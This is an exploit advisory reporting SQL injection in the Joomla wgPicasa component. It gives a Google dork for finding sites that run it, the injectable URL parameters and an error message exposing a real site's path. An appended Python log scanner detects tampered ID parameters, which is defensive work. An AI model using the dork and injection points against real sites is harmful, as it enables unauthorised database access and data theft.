- ####################################################################
- # Exploit Title : Joomla wgPicasa Components 3x SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 01/02/2019
- # Vendor Homepage : wgjoomla.com
- # Software Download Link : wgjoomla.com/cms/download-files
- # Software Information Link : extensions.joomla.org/extension/wgpicasa/
- # Software Version : 3x
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_wgpicasa''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- The wgPicasa extension is a very simple and powerful component to show
- your albums installed at Google Picasa Web Gallery (Google PLUS).
- No costs for hosting and easy to use.
- It is installed with the very popular "Light-box Slide Gallery".
- It is for Joomla 1.5, 2.5 and 3x versions.
- ####################################################################
- # Impact :
- ***********
- The wgPicasa 3x component for Joomla! is
- prone to an SQL-injection vulnerability because it fails to sufficiently
- sanitize user-supplied data before using it in an SQL query.
- A successful exploit may allow an attacker to compromise the application, access
- or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in the application's database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_wgpicasa&view=wgpicasa&Itemid=[SQL Injection]
- /index.php?option=com_wgpicasa&view=album&album=[ID-NUMBER]&page=[ID-NUMBER]&Itemid=[ID-NUMBER]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Strict Standards: Declaration of wgpicasaController::display() should be
- compatible with JController::display($cachable = false, $urlparams
- = false) in /var/www/vhosts/cidadedenaron.eu/httpdocs
- /components/com_wgpicasa/controller.php on line 26
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
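
An added detection example, not part of the original advisory: it scans web access logs for com_wgpicasa requests in which the `Itemid`, `album` or `page` parameters named above carry anything other than a plain integer. The combined log format, the sample log lines and the function names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory shows as numeric IDs in com_wgpicasa requests.
NUMERIC_PARAMS = ("Itemid", "album", "page")
# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2019:10:00:00 +0000] "GET /index.php?option=com_wgpicasa&view=wgpicasa&Itemid=126 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Feb/2019:10:00:05 +0000] "GET /index.php?option=com_wgpicasa&view=wgpicasa&Itemid=126%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [01/Feb/2019:10:00:09 +0000] "GET /index.php?option=com_wgpicasa&view=album&album=1&page=1%27&Itemid=30 HTTP/1.1" 500 312',
    '192.0.2.44 - - [01/Feb/2019:10:01:00 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 8000',
]

def non_numeric_params(target):
    """Return {param: decoded value} for ID parameters that are not plain integers."""
    # parse_qs percent-decodes values, so an encoded quote is seen as a quote.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_wgpicasa" not in query.get("option", []):
        return {}
    return {
        name: value
        for name in NUMERIC_PARAMS
        for value in query.get(name, [])
        if not re.fullmatch(r"[0-9]{1,10}", value)
    }

def scan(log_lines):
    """Return (line number, client address, findings) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = non_numeric_params(match.group(1))
        if findings:
            hits.append((number, line.split(" ", 1)[0], findings))
    return hits

if __name__ == "__main__":
    for number, client, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent non-numeric {findings}")
```

The same integer-only rule can be enforced at a WAF or reverse proxy in front of sites that still run the component.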